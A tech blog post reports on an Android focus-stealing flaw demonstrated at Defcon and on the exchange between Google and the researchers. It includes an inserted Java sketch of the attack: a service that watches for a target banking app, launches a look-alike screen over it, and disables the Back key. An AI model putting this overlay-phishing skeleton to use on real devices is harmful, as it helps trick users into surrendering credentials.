Every year, Defcon brings about some new concepts, hacks, vulnerabilities, and other digital tomfoolery. Sometimes it's all in good fun, but other times it's all too scary, which happens to be the case with a new class of Android malware that could allow for phishing attacks and pop-up ads alike.
Thanks to a design flaw in Android, an application can steal focus and pull itself into the foreground without going through the notification system at all. Worse, the app can intercept the 'back' button so that it no longer returns you to the previously opened application, all but locking you into its interface.
Now, while this could be used as a legitimate feature in some apps, the negative aspects of such a capability far outweigh the good. In the example given at Defcon, a game was written with embedded phishing screens that would randomly steal focus -- screens made to look like Facebook, Amazon, Google Voice, and GMail. At this point, I'm sure you can already see where this is going: if an unsuspecting user sees a familiar interface pop into the foreground asking for sensitive data, what reason would he or she have not to type in their information? Having Facebook or email credentials stolen is troubling enough; consider what could happen if the malware were made to replicate a common banking app instead. The results could be devastating.
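To make the mechanism concrete, here is an added illustration, in the Android Java of that era, of the three behaviours the post describes: learning which app is in the foreground, launching over it without any user action, and swallowing the Back key. This is my own sketch, not code from the Defcon talk, from the researchers, or from Google; the package names, class names and polling interval are made up, and the manifest would need android.permission.GET_TASKS for the task query.

```java
// Added illustration of the focus-stealing pattern described above.
// Not code from the Defcon talk; names below are hypothetical.
package com.example.focusdemo; // hypothetical package

import android.app.Activity;
import android.app.ActivityManager;
import android.app.Service;
import android.content.Intent;
import android.os.Bundle;
import android.os.Handler;
import android.os.IBinder;
import android.widget.TextView;

import java.util.List;

/** Background service that polls the foreground task and jumps in front of a chosen app. */
public class FocusWatcher extends Service {
    // Hypothetical target: the app whose look the overlay imitates.
    private static final String TARGET_PACKAGE = "com.example.targetbank";
    private static final long POLL_MS = 1000; // arbitrary polling interval

    private final Handler handler = new Handler();
    private final Runnable poll = new Runnable() {
        @Override public void run() {
            ActivityManager am = (ActivityManager) getSystemService(ACTIVITY_SERVICE);
            // On the Android versions the talk covered, any app holding GET_TASKS
            // could read the top task of every other app this way.
            List<ActivityManager.RunningTaskInfo> tasks = am.getRunningTasks(1);
            if (!tasks.isEmpty()
                    && TARGET_PACKAGE.equals(tasks.get(0).topActivity.getPackageName())) {
                // Target is in front: start our own task on top of it. No tap,
                // no notification; the user simply sees a new screen appear.
                Intent i = new Intent(FocusWatcher.this, StickyActivity.class);
                i.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
                startActivity(i);
                // One-shot for the illustration: stop polling once shown.
            } else {
                handler.postDelayed(this, POLL_MS);
            }
        }
    };

    @Override public int onStartCommand(Intent intent, int flags, int startId) {
        handler.post(poll);
        return START_STICKY;
    }

    @Override public IBinder onBind(Intent intent) { return null; }
}

/** The look-alike screen; it consumes Back so the user cannot return to the real app. */
class StickyActivity extends Activity {
    @Override protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        // Placeholder UI; a real overlay would draw the imitated login form here.
        TextView v = new TextView(this);
        v.setText("Sign in");
        setContentView(v);
    }

    @Override public void onBackPressed() {
        // Deliberately empty: Back no longer returns to the previously opened app.
    }
}
```

The polling loop is the part the researchers object to in their reply: nothing in the Android model of the time stopped a third-party app from learning the foreground package and launching over it, so the only user-visible tell is that the look-alike arrives unannounced, with no tap and no notification. Later releases narrowed both primitives, with getRunningTasks() returning only the caller's own tasks from Android 5.0 and background activity starts blocked from Android 10, but the post's point about the Market being the only line of defence applied to the devices of its day.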
Naturally, Google responded to this finding, nearly brushing it off as if it were nothing.
Switching between applications is a desired capability used by many applications to encourage rich interaction between applications. We haven't seen any apps maliciously using this technique on Android Market and we will remove any apps that do.
Not happy with that retort, the researchers who discovered this potential threat fired back with a solid response:
Application switching is not the issue. The real issue is the ability for other apps to identify which app is in the foreground and then decide to jump in front of that running app without the user giving it permission to do so. We also don't see how they could determine the difference between a malicious app and a legitimate one since they would both look almost identical until a user reports it to them as malicious. The 'wait until an app is reported bad before removing' stance is dangerous and will likely prove to be a fruitless effort as attackers could post apps much faster than Google could identify and remove them from the Market.
Personally, I have never had an app steal the foreground in this manner, but moving forward, I guarantee that I will be wary of any app that utilizes this feature -- regardless of how legitimate the request seems.